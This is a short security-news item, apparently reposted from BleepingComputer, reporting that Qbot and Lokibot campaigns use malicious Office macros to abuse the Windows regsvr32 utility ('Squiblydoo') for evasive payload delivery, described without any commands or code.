Security News > 2022 > February > Qbot, Lokibot malware switch back to Windows Regsvr32 delivery

Qbot, Lokibot malware switch back to Windows Regsvr32 delivery
2022-02-10 16:25

Malware distributors have turned to an older trick known as Squiblydoo to spread Qbot and Lokibot via Microsoft Office document using regsvr32.

A report from the threat research team at security analytics platform Uptycs shows that the use of regsvr32.

The regsvr32 is a Windows command-line utility used for registering and unregistering OLEs in the registry.

The threat actors abuse the utility not for making registry modifications but for loading COM scriptlets from a remote source using DLLs. For this purpose, they use regsvr32 to register OCX files, which are special-purpose software modules that can call ready-made components, such as DLLs. This technique is called "Squiblydoo", and it has been employed in malware-dropping operations since 2017.

In the currently ongoing campaign, threat actors use Excel, Word, RTF, and composite document files with malicious macros that start the regsvr32 as a child process.

The above method provides good evasion for the malware payload, because regsvr32 is a Windows tool used for multiple routine operations.


News URL

https://www.bleepingcomputer.com/news/security/qbot-lokibot-malware-switch-back-to-windows-regsvr32-delivery/